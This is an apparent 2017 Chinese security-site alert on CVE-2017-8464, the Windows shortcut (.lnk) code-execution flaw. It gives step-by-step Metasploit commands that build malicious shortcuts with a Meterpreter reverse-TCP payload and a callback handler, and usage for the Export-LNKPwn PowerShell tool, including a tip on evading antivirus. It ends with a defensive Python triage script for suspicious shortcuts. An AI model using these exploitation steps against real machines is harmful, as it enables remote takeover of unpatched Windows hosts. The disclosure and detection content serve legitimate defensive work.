myhack58 | 佚名 (Anonymous) | MYHACK58:62201788412
History: Aug 07, 2017 - 12:00 a.m.

“Stuxnet third generation” (CVE-2017-8464): several exploitation methods and defenses - Vulnerability alert - 黑吧安全网 (myhack58)

2017-08-07 00:00:00
佚名 (Anonymous)
www.myhack58.com

CVSS2: 9.3 High (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Access Vector: NETWORK; Access Complexity: MEDIUM; Authentication: NONE
Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE
EPSS: 0.975 High (percentile 100.0%)

As early as June 13, Microsoft released a patch for the vulnerability numbered CVE-2017-8464. A local or remote attacker can craft a malicious shortcut (.lnk) file and, by delivering it on a removable drive or through a remote share, obtain code execution as soon as Windows Explorer (or any other application that parses the .lnk) displays it. Looking back, a vulnerability of the same kind (CVE-2010-2568) was used by the Stuxnet worm, developed under the codename “Olympic Games” and attributed to the NSA, to sabotage Iran's nuclear program.
Versions affected by CVE-2017-8464:
Windows 7
Windows 8.1
Windows RT 8.1
Windows 10
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Exploitation
1) Using CVE-2017-8464 in Metasploit Framework

  1. First download the latest zip package【download】. After extracting it, copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb from the archive into /usr/share/metasploit-framework/modules/exploits/windows/fileformat/.
  2. Copying only the .rb file produces an error: the module also needs its template data, so copy the data/exploits/cve-2017-8464 folder from the archive into /usr/share/metasploit-framework/data/exploits/.
  3. Open a terminal:
    msfconsole
    use exploit/windows/fileformat/cve_2017_8464_lnk_rce
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST [your IP address]
    exploit
    Afterwards the files we need are generated under /root/.msf4/local. So many shortcuts are produced because each one must embed the absolute path of the DLL, and the drive letter the removable disk will be assigned on the target is not known in advance, so one LNK is generated per drive letter and none is left out.
  4. Next, start the handler:
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST [your IP address]
    run
  5. Copy the generated files to a removable disk and insert it into the target machine. If AutoPlay is enabled on the target, choosing the option to browse the files is enough: Explorer parses the shortcut while rendering the folder and the Meterpreter session connects back.
2) PowerShell (Export-LNKPwn)
  This PowerShell method is not the CVE-2017-8464 reproduction method that circulated online earlier.
  First download Export-LNKPwn.ps1【Click here】
  Notes:
  - Requires .NET 4.0 or above. The author used a few constructs that only exist in PowerShell 5.0, such as the ::new() constructor syntax, and intends to lower the requirement to .NET 3.5 and PowerShell 2.0 so that the module can be loaded into memory in every target environment.
  - The author intends to extend the functionality so that users can also generate the original Stuxnet LNK exploit (CVE-2010-2568) and the CVE-2015-0096 patch-bypass variant.
  - Antivirus products will flag the resulting LNK; be prepared to put extra work into evading detection.
  Parameters:
  LNKOutPath: full local path where the LNK file is saved.
  TargetCPLPath: full local or remote path of the target .cpl.
  Type: which folder data block the LNK uses, either "SpecialFolderDataBlock" or "KnownFolderDataBlock".
  Usage examples:
  C:\PS> Export-LNKPwn -LNKOutPath C:\Some\Local\Path.lnk -TargetCPLPath C:\Target\CPL\Path.cpl -Type SpecialFolderDataBlock
  C:\PS> Export-LNKPwn -LNKOutPath C:\Some\Local\Path.lnk -TargetCPLPath C:\Target\CPL\Path.cpl -Type KnownFolderDataBlock
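Both procedures above end in a shortcut file that a defender may find on a USB stick or a share, and Export-LNKPwn in particular embeds the path given in -TargetCPLPath together with the folder data block chosen with -Type. The following Python triage script is an added example, not code from the article, from Metasploit or from Export-LNKPwn: it parses the MS-SHLLINK layout far enough to read the LinkTargetIDList, the StringData and the ExtraData blocks, and flags a shortcut only when a SpecialFolderDataBlock or KnownFolderDataBlock and a .cpl reference occur together, because ordinary Start Menu shortcuts carry those blocks all the time. The two embedded .lnk byte strings are constructed samples: the ItemID payloads are placeholders rather than valid shell items, and the CSIDL value and GUID are illustrative.

```python
import struct
import uuid
from dataclasses import dataclass

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) that change the layout of the file body
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FLAGS = (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION)

# ExtraData block signatures (MS-SHLLINK 2.5); the two folder blocks are the ones -Type selects
SPECIAL_FOLDER_DATA_BLOCK = 0xA0000005
KNOWN_FOLDER_DATA_BLOCK = 0xA000000B
BLOCK_NAMES = {0xA0000001: "EnvironmentVariableDataBlock", 0xA0000003: "TrackerDataBlock",
               SPECIAL_FOLDER_DATA_BLOCK: "SpecialFolderDataBlock",
               0xA0000009: "PropertyStoreDataBlock", KNOWN_FOLDER_DATA_BLOCK: "KnownFolderDataBlock"}


@dataclass
class LnkSummary:
    flags: int
    id_list: bytes   # raw ItemID bytes of the LinkTargetIDList
    strings: list    # StringData entries in file order (name, relative path, ...)
    blocks: list     # [(signature, payload)] for every ExtraData block

    def folder_blocks(self):
        return [BLOCK_NAMES.get(sig, hex(sig)) for sig, _ in self.blocks
                if sig in (SPECIAL_FOLDER_DATA_BLOCK, KNOWN_FOLDER_DATA_BLOCK)]

    def references_cpl(self):
        # Shell items store the path as ANSI or UTF-16 at arbitrary alignment: check every view
        views = [self.id_list.decode("latin-1"), self.id_list.decode("utf-16-le", "ignore"),
                 self.id_list[1:].decode("utf-16-le", "ignore")]
        return any(".cpl" in s.lower() for s in views + self.strings)


def parse_lnk(data: bytes) -> LnkSummary:
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize: not a shell link")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("bad LinkCLSID: not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, id_list, strings, blocks = 0x4C, b"", [], []
    if flags & HAS_LINK_TARGET_ID_LIST:
        size = struct.unpack_from("<H", data, pos)[0]
        id_list = data[pos + 2:pos + 2 + size]
        pos += 2 + size
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize includes itself
    for flag in STRING_FLAGS:
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos + 2:pos + 2 + count * width]
            strings.append(raw.decode("utf-16-le" if width == 2 else "latin-1", "replace"))
            pos += 2 + count * width
    while pos + 4 <= len(data):                              # ExtraData until TerminalBlock
        size = struct.unpack_from("<I", data, pos)[0]
        if size < 8:                                         # TerminalBlock (size < 4) or junk
            break
        blocks.append((struct.unpack_from("<I", data, pos + 4)[0], data[pos + 8:pos + size]))
        pos += size
    return LnkSummary(flags, id_list, strings, blocks)


def assess(data: bytes) -> dict:
    """Flag only the combination folder-block AND .cpl target; the block alone is normal."""
    s = parse_lnk(data)
    fb, cpl = s.folder_blocks(), s.references_cpl()
    return {"folder_blocks": fb, "cpl_target": cpl, "suspicious": bool(fb) and cpl}


# --- constructed samples (not real exploit output) ----------------------------------------
def _header(flags):      # 76-byte ShellLinkHeader, ShowCommand = SW_SHOWNORMAL, rest zero
    return struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le + struct.pack(
        "<IIQQQIIIHHII", flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

def _id_list(items):     # IDListSize, then ItemIDSize(self-inclusive)+data ..., TerminalID
    body = b"".join(struct.pack("<H", len(i) + 2) + i for i in items) + b"\x00\x00"
    return struct.pack("<H", len(body)) + body

def _string(s):          # CountCharacters + UTF-16LE characters (IS_UNICODE set)
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")

# Export-LNKPwn-style shape: IDList naming a .cpl plus a SpecialFolderDataBlock
# (BlockSize 0x10, SpecialFolderID 0x03 = CSIDL_CONTROLS, Offset 0). Placeholder item bytes.
MALICIOUS_LNK = (_header(HAS_LINK_TARGET_ID_LIST)
                 + _id_list([b"\x1f\x50", "C:\\Target\\CPL\\Path.cpl".encode("utf-16-le")])
                 + struct.pack("<IIII", 0x10, SPECIAL_FOLDER_DATA_BLOCK, 0x03, 0)
                 + b"\x00\x00\x00\x00")

# Ordinary Start Menu style shortcut: relative path to notepad.exe and a KnownFolderDataBlock
# (BlockSize 0x1C, KnownFolderID GUID (placeholder), Offset). Folder block but no .cpl.
BENIGN_LNK = (_header(HAS_RELATIVE_PATH | IS_UNICODE) + _string(".\\notepad.exe")
              + struct.pack("<II", 0x1C, KNOWN_FOLDER_DATA_BLOCK) + uuid.UUID(int=0).bytes_le
              + struct.pack("<I", 0) + b"\x00\x00\x00\x00")

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(name, assess(blob))
```

Run assess() over every .lnk collected from removable media or a share to triage them before anyone opens the folder in Explorer. The check keys on the ".cpl" extension and on the presence of the folder blocks, so a renamed control-panel item or a differently encoded path will slip past it; treat a hit as a reason to pull the file into a sandbox, and treat the check itself as a stop-gap for hosts that have not yet received the June 2017 update, not as a substitute for it.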
